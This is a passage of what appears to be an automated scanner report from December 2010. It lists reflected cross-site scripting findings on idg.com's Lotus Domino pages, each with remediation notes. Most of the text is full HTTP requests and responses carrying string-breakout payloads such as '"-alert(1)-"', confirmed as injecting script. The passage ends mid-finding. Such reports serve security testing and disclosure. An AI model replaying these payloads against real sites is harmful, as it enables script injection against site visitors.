GET /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:38 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5024 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e94"%3b127e9d03196 was submitted in the REST URL parameter 1. This input was echoed as 34e94";127e9d03196 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www34e94"%3b127e9d03196/homenew.nsf/navmain.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www34e94";127e9d03196/homenew.nsf/navmain.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f539e"%3b607861d5da5 was submitted in the REST URL parameter 3. This input was echoed as f539e";607861d5da5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/navmain.cssf539e"%3b607861d5da5 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.cssf539e";607861d5da5"); } catch(err) {}</script> ...[SNIP]...
2.209. http://idg.com/www/homenew.nsf/navmain.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/navmain.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd433"-alert(1)-"2d45f6a6216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:25 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cd0f"%3bf6fb67135af was submitted in the REST URL parameter 1. This input was echoed as 3cd0f";f6fb67135af in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www3cd0f"%3bf6fb67135af/homenew.nsf/newsitems.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www3cd0f";f6fb67135af/homenew.nsf/newsitems.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f39"%3b146b3913e0f was submitted in the REST URL parameter 3. This input was echoed as c2f39";146b3913e0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/newsitems.cssc2f39"%3b146b3913e0f HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.cssc2f39";146b3913e0f"); } catch(err) {}</script> ...[SNIP]...
2.212. http://idg.com/www/homenew.nsf/newsitems.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/newsitems.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 652e1"-alert(1)-"826b15b8000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:28 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5030 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcdfe"-alert(1)-"a48c23ad8af was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5057 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... cript type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46fe3"%3b067128b6aef was submitted in the REST URL parameter 1. This input was echoed as 46fe3";067128b6aef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www46fe3"%3b067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5047 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www46fe3";067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c119d"%3be19dc6781a0 was submitted in the REST URL parameter 3. This input was echoed as c119d";e19dc6781a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/public_smo_scripts.jsc119d"%3be19dc6781a0?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5047 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.jsc119d";e19dc6781a0?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.216. http://idg.com/www/homenew.nsf/public_smo_scripts.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/public_smo_scripts.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ca8"-alert(1)-"85e454a4e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:37 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5038 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfaa1"-alert(1)-"205fabb7143 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5046 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ce5"%3b380f1fa090 was submitted in the REST URL parameter 1. This input was echoed as f4ce5";380f1fa090 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwf4ce5"%3b380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5035 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwf4ce5";380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88126"%3bbb2e45fb221 was submitted in the REST URL parameter 3. This input was echoed as 88126";bb2e45fb221 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/request.js88126"%3bbb2e45fb221?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:28 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5036 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js88126";bb2e45fb221?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.220. http://idg.com/www/homenew.nsf/request.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/request.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9da4"-alert(1)-"4abb3a2a387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:36 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b5c"%3b82c384e1acd was submitted in the REST URL parameter 1. This input was echoed as a2b5c";82c384e1acd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwa2b5c"%3b82c384e1acd/homenew.nsf/screen2.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
